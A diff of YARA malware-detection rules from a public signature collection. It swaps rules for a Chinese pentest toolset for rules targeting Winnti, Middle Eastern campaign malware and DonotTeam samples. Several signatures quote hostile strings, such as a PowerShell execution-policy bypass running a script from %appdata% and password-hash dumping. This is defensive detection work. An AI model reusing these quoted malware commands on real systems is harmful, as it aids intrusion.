-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L377-L392"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L221-L235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
-		logic_hash = "bd6f9b6e831573164fddf7f0188087eb0076410b77c9c06cfacadebe6a53b525"
-		score = 70
+		logic_hash = "32909e915a6e602ad1e8698cf5c128c2e54670770b97f54b1414c5798c42cc00"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "LOADER ERROR" fullword ascii
-		$s15 = "2011-2012 T00LS&RICES" fullword wide
+		$b1 = { 4C 8D 41 24 33 D2 B9 03 00 1F 00 FF 9? F8 00 00 00 48 85 C0 74 }
+		$b2 = { 4C 8B 4? 08 BA 01 00 00 00 49 8B C? FF D0 85 C0 [2-6] C7 4? 1C 01 00 00 00 B8 01 00 00 00 }
+		$b3 = { 8B 4B E4 8B 53 EC 41 B8 00 40 00 00 4? 0B C? FF 9? B8 00 00 00 EB }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2077KB and all of them
+		(2 of ( $b* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Matrixay1073 : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_5
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L394-L412"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "2a8f28e6-5a01-5a2f-b89b-9c34163afcda"
+		date = "2019-12-06"
+		modified = "2023-12-05"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L237-L264"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fef951e47524f827c7698f4508ba9551359578a5"
-		logic_hash = "e64cae48344e5dae8ec80b2897305a0b380340bdd2973eb0828582f18ef8bf2b"
-		score = 70
+		logic_hash = "977d11fbb7cf4678d4da179c43d5566520ee97ac528e269a9b985e5bc75641b7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii
-		$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii
-		$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii
-		$s3 = "getalluserpasswordhash" fullword ascii
+		$a1 = "-k netsvcs" ascii
+		$a2 = "svchost.exe" ascii fullword
+		$a3 = "%SystemRoot%\\System32\\ntoskrnl.exe" ascii
+		$a4 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii
+		$a5 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii
+		$a6 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii
+		$a7 = "cmd.exe" wide
+		$a8 = ",XML" wide
+		$a9 = "\\rundll32.exe" wide
+		$a10 = "\\conhost.exe" wide
+		$a11 = "\\cmd.exe" wide
+		$a12 = "NtQueryInformationProcess" ascii
+		$a13 = "Detours!" ascii fullword
+		$a14 = "Loading modified build of detours library designed for MPC-HC player (http://sourceforge.net/projects/mpc-hc/)" ascii
+		$a15 = "CONOUT$" wide fullword
+		$a16 = { C6 0? E9 4? 8? 4? 05 [2] 89 4? 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9100KB and all of them
+		(12 of ( $a* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Sword1_5 : FILE
+rule SIGNATURE_BASE_APT_CN_Group_Loader_Jan20_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
-		date = "2015-06-23"
+		description = "Detects loaders used by Chinese groups"
+		author = "Vitali Kremez"
+		id = "c85ae499-4f76-56ff-877d-887e1a7fc077"
+		date = "2020-02-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L414-L431"
+		reference = "https://twitter.com/VK_Intel/status/1223411369367785472?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L266-L278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
-		logic_hash = "0f7630b2ec983df2a065b049000cef6de38f884254748a342b2fd84d8c5985af"
-		score = 70
+		logic_hash = "30a180ada2390ca8df4bf7883624a5a176249622b4c34ce96931fe62b09ea8e3"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "http://www.md5.com.cn" fullword wide
-		$s2 = "ListBox_Command" fullword wide
-		$s3 = "\\Set.ini" wide
-		$s4 = "OpenFileDialog1" fullword wide
+		$xc1 = { 8B C3 C1 E3 10 C1 E8 10 03 D8 6B DB 77 83 C3 13 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 740KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Havij_Havij : FILE
+rule SIGNATURE_BASE_Winnti_Dropper_X64_Libtomcrypt_Fns : TAU CN APT
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
-		date = "2015-06-23"
+		description = "Designed to catch winnti 4.0 loader and hack tool x64"
+		author = "CarbonBlack Threat Research"
+		id = "080d837c-248f-5718-b4a2-290495cd3b38"
+		date = "2019-08-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L433-L448"
+		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L280-L327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
-		logic_hash = "e8aff3e1e536cd35b10bdaab4818542bce284e7ed3aa7ef1920763669faf4c8a"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "39d23f2a12a3b78182e52847e2fdb2d09386765138c37eb7f75edfc680505531"
+		score = 75
+		quality = 83
+		tags = "TAU, CN, APT"
+		rule_version = 1
+		yara_version = "3.8.1"
+		Confidence = "Prod"
+		Priority = "High"
+		TLP = "White"
+		exemplar_hashes = "5ebf39d614c22e750bb8dbfa3bcb600756dd3b36929755db9b577d2b653cd2d1"
+		sample_md5 = "794E127D627B3AF9015396810A35AF1C"
 
 	strings:
-		$s1 = "User-Agent: %Inject_Here%" fullword wide
-		$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii
+		$0x140001820 = { 48 83 EC 28 83 3D ?? ?? ?? ?? 00 }
+		$0x140001831 = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x140001842 = { B8 0B 00 E0 0C 48 83 C4 28 C3 }
+		$0x14000184c = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x140001881 = { B8 0C 00 E0 0C 48 83 C4 28 C3 }
+		$0x14000188b = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x1400018e4 = { B8 0D 00 E0 0C 48 83 C4 28 C3 }
+		$0x1400018ee = { 48 8D 0D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B8 A0 01 00 00 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 01 00 00 00 }
+		$0x140001911 = { 33 C0 48 83 C4 28 C3 }
+		$0x140001670 = { 40 55 56 57 41 55 41 56 41 57 B8 38 12 00 00 E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 10 12 00 00 48 8B AC 24 90 12 00 00 4C 8B B4 24 A0 12 00 00 45 33 FF 44 39 3D ?? ?? ?? ?? 49 8B F1 41 0F B7 F8 4C 8B EA 44 8B D9 66 44 89 7C 24 40 }
+		$0x1400016c8 = { B8 01 00 E0 0C }
+		$0x1400016d2 = { 48 89 9C 24 30 12 00 00 4D 85 C9 }
+		$0x1400016ec = { 8B 9C 24 98 12 00 00 83 FB 01 }
+		$0x1400016fc = { 48 8D 54 24 40 }
+		$0x140001701 = { 4C 89 A4 24 28 12 00 00 E8 ?? ?? ?? ?? 44 0F B7 64 24 40 66 44 3B E7 }
+		$0x140001727 = { 48 8D 54 24 40 41 8B CB E8 ?? ?? ?? ?? 0F B7 94 24 A8 12 00 00 66 39 54 24 40 }
+		$0x140001750 = { 41 8B CB E8 ?? ?? ?? ?? 8B F8 83 F8 FF }
+		$0x14000175f = { B8 0F 00 E0 0C }
+		$0x140001764 = { 4C 8B A4 24 28 12 00 00 }
+		$0x14000176c = { 48 8B 9C 24 30 12 00 00 }
+		$0x140001774 = { 48 8B 8C 24 10 12 00 00 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 38 12 00 00 41 5F 41 5E 41 5D 5F 5E 5D C3 }
+		$0x140001795 = { 48 8D 4C 24 54 33 D2 41 B8 B4 11 00 00 44 89 7C 24 50 E8 ?? ?? ?? ?? 48 8D 44 24 50 48 89 44 24 30 45 0F B7 CC 4D 8B C5 49 8B D6 8B CF 44 89 7C 24 28 44 89 7C 24 20 E8 ?? ?? ?? ?? 85 C0 }
+		$0x1400017d5 = { 4C 8D 4C 24 50 44 8B C3 48 8B D5 48 8B CE E8 ?? ?? ?? ?? 48 8D 4C 24 50 8B D8 E8 ?? ?? ?? ?? 8B C3 }
+		$0x1400017fb = { B8 04 00 E0 0C }
+		$0x140001805 = { B8 03 00 E0 0C }
+		$0x14000180f = { B8 02 00 E0 0C }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11011 : FILE
+rule SIGNATURE_BASE_Winnti_Dropper_X86_Libtomcrypt_Fns : TAU CN APT
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
-		date = "2015-06-23"
+		description = "Designed to catch winnti 4.0 loader and hack tool x86"
+		author = "CarbonBlack Threat Research"
+		id = "48e7a3b0-55c7-5db5-855f-1614bd00afb4"
+		date = "2019-08-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L450-L468"
+		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L329-L370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
-		logic_hash = "f92d71f163a49a158d85b821d71fd17e84e0d3deb19515ae0cf6a063a05c027b"
-		score = 70
+		logic_hash = "84bfe001758677ff3a0d60d98e29c33ad1525a0afb27b73df750b2131e298879"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "TAU, CN, APT"
+		rule_version = 1
+		yara_version = "3.8.1"
+		confidence = "Prod"
+		oriority = "High"
+		TLP = "White"
+		exemplar_hashes = "0fdcbd59d6ad41dda9ae8bab8fad9d49b1357282027e333f6894c9a92d0333b3"
+		sample_md5 = "da3b64ec6468a4ec56f977afb89661b1"
 
 	strings:
-		$s0 = "\\i386\\Hello.pdb" ascii
-		$s1 = "OS not supported." fullword ascii
-		$s2 = ".Rich5" fullword ascii
-		$s3 = "Not supported." fullword wide
-		$s5 = "cmd.exe" fullword ascii
+		$0x401d20 = { 8B 0D ?? ?? ?? ?? 33 C0 85 C9 }
+		$0x401d30 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 83 F8 ?? }
+		$0x401d46 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 10 83 F8 ?? }
+		$0x401d76 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 1C 83 F8 ?? }
+		$0x401dc4 = { 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 33 C0 F3 A5 5F C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 5E C3 }
+		$0x401bd0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 56 57 85 C0 C7 45 FC ?? ?? ?? ?? }
+		$0x401bf4 = { 8B 45 14 85 C0 }
+		$0x401bff = { 8B 45 18 85 C0 }
+		$0x401c14 = { 8B 7D 08 8D 45 FC 50 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 08 66 }
+		$0x401c31 = { 8B 45 0C 85 C0 }
+		$0x401c3c = { 8D 4D FC 51 57 E8 ?? ?? ?? ?? 66 8B 55 FC 83 C4 08 66 3B 55 24 }
+		$0x401c57 = { 8B 5D 20 85 DB }
+		$0x401c62 = { 57 E8 ?? ?? ?? ?? 8B D0 83 C4 04 83 FA ?? }
+		$0x401c72 = { B9 ?? ?? ?? ?? 33 C0 8D BD 48 EE FF FF C7 85 44 EE FF FF ?? ?? ?? ?? F3 AB 8B 4D 0C 8D 85 44 EE FF FF 50 6A ?? 81 E6 FF FF 00 00 6A ?? 56 51 53 52 E8 ?? ?? ?? ?? 83 C4 1C 85 C0 }
+		$0x401caf = { 8B 45 1C 8B 4D 18 8D 95 44 EE FF FF 52 8B 55 14 50 51 52 E8 ?? ?? ?? ?? 8B F0 8D 85 44 EE FF FF 50 E8 ?? ?? ?? ?? 83 C4 14 8B C6 5F 5E 5B 8B E5 5D C3 }
+		$0x401ce1 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401ced = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401cf9 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401d05 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
+		$0x401d16 = { 5F 5E 5B 8B E5 5D C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_DLL_Passive_Privilege_Escalation_Ws2Help : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
-		date = "2015-06-23"
+		id = "7c844c5c-caf0-5968-ac1a-72886fcf97cf"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L470-L485"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L13-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
-		logic_hash = "e13f33e48d5c1aeaef6c50287f74e03fb7b65667d597768d448e76f5a375b34f"
-		score = 70
+		logic_hash = "e5ea689de4be64a02aed31c85a4bd56561ba932587998bc276ddba248d73fa2d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "PassMinDll.dll" fullword ascii
-		$s1 = "\\ws2help.dll" ascii
+		hash1 = "1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "618f76eaf4bd95c690d43e84d617efe9" )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "12870766-2b85-522d-9ad8-abba2786caaf"
-		date = "2015-06-23"
+		id = "a0beec30-62ff-54c3-ab62-c54454b89f8d"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L487-L503"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L28-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
-		logic_hash = "d48a10313afcb5a2084229937703bbc11958a5cd11f8f27fbc8dae15ddfd5ed1"
-		score = 70
+		logic_hash = "414e7760c56d2a1713258bb5c5f65e4fb561523ae037f8715d7fba5914ef9211"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881"
 
 	strings:
-		$s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii
-		$s2 = "Do you want to cancel the file download?" fullword ascii
-		$s3 = "Downloading: %s" fullword ascii
+		$s1 = "QuickAssist.exe" fullword wide
+		$s2 = "<description>Microsoft Modern Sharing Solution</description>" fullword ascii
+		$s3 = "GBEWCWA" fullword ascii
+		$s4 = "name=\"QuickAssist\" " fullword ascii
+		$s5 = "Cimzal" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 381KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b06055e6cc2a804111ab6964df1ca4ae" or 4 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Aspxclient : FILE
+rule SIGNATURE_BASE_ME_Campaign_Malware_3 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L505-L523"
+		id = "d8bfd426-ff42-5332-8206-67a558509494"
+		date = "2018-02-07"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L50-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "67569a89128f503a459eab3daa2032261507f2d2"
-		logic_hash = "4d0a93434673952fed38e384db526275b9eb32bac9a207c91f792d4d113c40f1"
-		score = 70
+		logic_hash = "7d45f9f624285ed13a16901335585490459f22ef8af157c38b720118735ed432"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$s1 = "\\tools\\hashq\\hashq.exe" wide
-		$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
-		$s3 = "\\myshell.mdb" wide
-		$s4 = "injectfile" fullword wide
+		$x1 = "objWShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"%appdata%\"\"\\sys.ps1\", 0 " fullword ascii
+		$x2 = "objFile.WriteLine \"New-Item -Path \"\"$ENV:APPDATA\\Microsoft\\Templates\"\" -ItemType Directory -Force }\" " fullword ascii
+		$x3 = "objFile.WriteLine \"$path = \"\"$ENV:APPDATA\\Microsoft\\Templates\\Report.doc\"\"\" " fullword ascii
+		$s4 = "File=appData & \"\\sys.ps1\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them
+		uint16( 0 ) == 0x6553 and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Fckeditor : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_4 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
-		date = "2015-06-23"
+		id = "1ff83ac6-e3f1-55e2-a811-e526b8235c78"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L525-L540"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L68-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4b16ae12c204f64265acef872526b27111b68820"
-		logic_hash = "0fd231fc81b2b7b5647a8016774f35751ac68646856a15c17ce4d2c07eaf1761"
-		score = 70
+		logic_hash = "83340b2d8f5f58f886eb318b80d7fbb0b9a4f5ad634db857edc405932f3ea5bc"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide
-		$s7 = "Fckeditor.exe" fullword wide
+		hash1 = "c5bfb5118a999d21e9f445ad6ccb08eb71bc7bd4de9e88a41be9cf732156c525"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1340KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "fb7da233a35ac523d6059fff543627ab"
 }
-rule SIGNATURE_BASE_CN_Honker_Codeeer_Explorer : FILE
+rule SIGNATURE_BASE_ME_Campaign_Malware_5 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L542-L557"
+		id = "241a4236-2688-5920-87f7-eed33963ec60"
+		date = "2018-02-07"
+		modified = "2022-08-18"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_middle_east_talosreport.yar#L81-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
-		logic_hash = "299d0181beb5032dcb327516a7526d6131e2212623ffa9e592f54f80473b098d"
-		score = 70
+		logic_hash = "b958a09be09de03e702a0653cf51148698b35c29bed90edbc3a65e485f0c3aa6"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d49e9fdfdce1e93615c406ae13ac5f6f68fb7e321ed4f275f328ac8146dd0fc1"
+		hash2 = "e66af059f37bdd35056d1bb6a1ba3695fc5ce333dc96b5a7d7cc9167e32571c5"
 
 	strings:
-		$s2 = "Codeeer Explorer.exe" fullword wide
-		$s12 = "webBrowser1_ProgressChanged" fullword ascii
+		$s1 = "D:\\me\\do\\do\\obj\\" ascii
+		$s2 = "Select * from Win32_ComputerSystem" fullword wide
+		$s3 = "Get_Antivirus" fullword ascii
+		$s4 = "{{\"id\":\"{0}\",\"user\":\"{1}\",\"path\":\"{2}\"}}" fullword wide
+		$s5 = "update software online" fullword wide
+		$s6 = "time.nist.gov" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 470KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 5 of them or all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Swordhonkeredition : FILE
+
+rule SIGNATURE_BASE_APT_Donotteam_Ytyframework : APT DONOTTEAM WINDOWS FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
-		date = "2015-06-23"
+		description = "Modular malware framework with similarities to EHDevel"
+		author = "James E.C, ProofPoint"
+		id = "6dd07019-aa5a-5966-8331-b6f6758b0652"
+		date = "2018-08-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L559-L575"
